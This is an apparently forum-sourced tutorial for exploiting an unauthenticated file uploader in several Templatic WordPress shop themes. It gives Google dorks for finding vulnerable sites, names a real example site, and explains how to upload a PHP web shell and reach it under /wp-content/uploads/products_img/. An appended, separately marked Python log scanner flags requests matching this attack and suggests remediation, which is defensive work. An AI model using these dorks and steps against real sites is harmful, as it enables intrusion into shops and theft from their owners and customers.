This is an Old Exploit
WordPress Themes Vulnerable to this Exploit:
WPStore
eShop
KidzStore
Emporium
Store
eCommerce
framework
Tutorial
1. Go to Google and search this dork:
"StoreBox by Templatic" intext:rings
"StoreBox by Templatic" intext:dress
"StoreBox by Templatic" intext:shoes
"StoreBox by Templatic" intext:jacket
"StoreBox by Templatic" intext:jeans
"StoreBox by Templatic" intext:clothes
"StoreBox by Templatic" intext:purse
2. Click on any Website
Example:
Right-click and click View Page Source:
3. Locate the theme within the source code.
Which is:
http://shopshack.net/wp-content/themes/framework/
Notice that the theme is /framework/.
We have now found a vulnerable theme to test the exploit.
4. Next, add /upload/ to the end of the URL after /framework/
5. Use the Uploader to upload your shell. (Supports: .php .txt .html)
Shell Access:
/wp-content/uploads/products_img/SHELL.php
More Dorks:
inurl:/wp-content/themes/wpstore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
inurl:/wp-content/themes/framework/chkorder.php?color=
inurl:/wp-content/themes/wpstore/thumb.php?src=
inurl:/wp-content/themes/framework/thumb.php?src=
inurl:/wp-content/themes/eCommerce/thumb.php?src=
inurl:/wp-content/themes/framework/getsubcat.php?q=
Credits to: HackForums
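
A log check for site owners, added here and not part of the original post: it scans web server access logs (Combined Log Format is assumed) for requests to the upload/ directory of the themes listed above and for .php, .txt or .html files served from /wp-content/uploads/products_img/. The sample log lines, IP addresses and file names are constructed.

```python
import re

# Theme directory names taken from the post's list of affected themes.
AFFECTED_THEMES = ("wpstore", "eshop", "kidzstore", "emporium",
                   "store", "ecommerce", "framework")
# Assumed format: host ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# The theme's uploader lives under <theme>/upload/ (theme names are case-insensitive here).
UPLOADER_RE = re.compile(
    r"^/wp-content/themes/(?:%s)/upload(?:[/?]|$)" % "|".join(AFFECTED_THEMES),
    re.IGNORECASE)
# File types the post says the uploader accepts, served from the image directory.
DROPPED_RE = re.compile(
    r"^/wp-content/uploads/products_img/[^?]*\.(?:php|txt|html)(?:\?|$)",
    re.IGNORECASE)

def classify(line):
    """Return (ip, finding) for a suspicious log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    if UPLOADER_RE.match(path):
        kind = "uploader-post" if m.group("method") == "POST" else "uploader-probe"
        return m.group("ip"), kind
    if DROPPED_RE.match(path) and m.group("status") == "200":
        return m.group("ip"), "non-image-in-products_img"
    return None

def scan(text):
    """Classify every line of a log and keep only the findings."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

# Constructed sample lines (documentation IP ranges, hypothetical file names).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2014:10:01:02 +0000] "GET /wp-content/themes/framework/upload/ HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2014:10:01:40 +0000] "POST /wp-content/themes/framework/upload/ HTTP/1.1" 200 311 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2014:10:02:05 +0000] "GET /wp-content/uploads/products_img/x.php?a=1 HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2014:10:03:00 +0000] "GET /wp-content/uploads/products_img/ring.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Mar/2014:10:03:09 +0000] "GET /wp-content/themes/twentytwelve/style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Any hit is a reason to remove the theme's upload/ directory and to deny script execution under wp-content/uploads/ in the web server configuration.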